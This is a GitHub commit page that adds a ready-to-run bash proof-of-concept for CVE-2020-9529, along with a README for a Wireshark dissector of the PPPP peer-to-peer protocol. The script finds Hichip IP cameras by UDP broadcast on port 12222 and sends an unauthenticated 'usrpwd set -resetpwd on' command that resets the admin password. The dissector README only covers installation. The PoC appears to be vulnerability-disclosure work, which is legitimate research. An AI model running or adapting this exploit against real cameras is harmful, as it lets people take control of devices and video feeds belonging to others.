-
Notifications
You must be signed in to change notification settings - Fork 24
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
added p2p dissector and hichip pw reset script
- Loading branch information
0 parents
commit 37a6d7c
Showing
5 changed files
with
696 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
# Hichip IP Camera Admin Password Reset | ||
|
||
PoC for [CVE-2020-9529](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9529) to locally reset the password of cameras manufactured by Shenzhen Hichip Vision Technology. | ||
|
||
## Prerequisites | ||
|
||
Requires `socat` | ||
|
||
## Usage | ||
|
||
Invoke with `./reset.sh` and enter target device IP (or press enter for autodiscovery) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,41 @@ | ||
#!/bin/bash | ||
# | ||
# Copyright (c) 2020, Paul A. Marrapese <paul@redprocyon.com> | ||
# All rights reserved. | ||
# | ||
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS | ||
# SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE | ||
# AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES | ||
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, | ||
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE | ||
# OF THIS SOFTWARE. | ||
|
||
pw_reset() { | ||
echo [*] Searching for device... | ||
dev_ip=${1:-'255.255.255.255'} | ||
response=$(echo -ne 'SEARCH * HDS/1.0\r\nCSeq:1\r\nClient-ID:bogus\r\n\r\n' | socat - UDP-DATAGRAM:$dev_ip:12222,broadcast,sourceport=12222 | tr -d '\r') | ||
dev_id=$(echo "$response" | grep Device-ID= | cut -d = -f 2) | ||
dev_ip=$(echo "$response" | grep IP= | cut -d = -f 2) | ||
#echo "$response" | ||
|
||
if [[ -z $dev_id ]]; then | ||
echo [*] No device found. | ||
exit 1 | ||
fi | ||
|
||
echo [*] Resetting admin password of device at $dev_ip... | ||
response=$(echo -ne 'CMD * HDS/1.0\r\nCSeq:1\r\nClient-ID:bogus\r\nDevice-ID:'$dev_id'\r\nContent-Length:23\r\n\r\nusrpwd set -resetpwd on' | socat - UDP-DATAGRAM:$dev_ip:12222,broadcast,sourceport=12222 | tr -d '\r') | ||
if [[ -z $response ]]; then | ||
echo [*] No response received, device may not be vulnerable. | ||
exit 1 | ||
fi | ||
|
||
echo [*] Response received! | ||
echo "$response" | ||
} | ||
|
||
echo '[*] Hichip IP Camera Admin Password Reset (CVE-2020-9529)' | ||
echo '[*] Copyright (c) 2020, Paul A. Marrapese <paul@redprocyon.com>' | ||
echo -n 'Enter device IP (or press enter for autodiscovery): ' | ||
read dev_ip | ||
pw_reset $dev_ip |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,11 @@ | ||
# P2P Wireshark Dissector | ||
|
||
Dissector for the "PPPP" protocol, as used by CS2 Network P2P and Shenzhen Yunni iLnkP2P. | ||
|
||
## Installation | ||
|
||
1. Download the appropriate version of the [Wireshark Generic Dissector](http://wsgd.free.fr/download.html) plugin for your version of Wireshark | ||
2. Copy `generic.dll` to the desired plugin directory | ||
(see [WSGD installation](http://wsgd.free.fr/installation.html), e.g. `C:\Users\<username>\AppData\Roaming\Wireshark\plugins\3.2\epan`) | ||
3. Copy `pppp.wsgd` (protocol file) and `pppp.fdesc` (data format description file) to the desired directory | ||
(see [WSGD installation](http://wsgd.free.fr/installation.html), e.g., `C:\Users\<username>\AppData\Roaming\Wireshark\profiles`) |
Oops, something went wrong.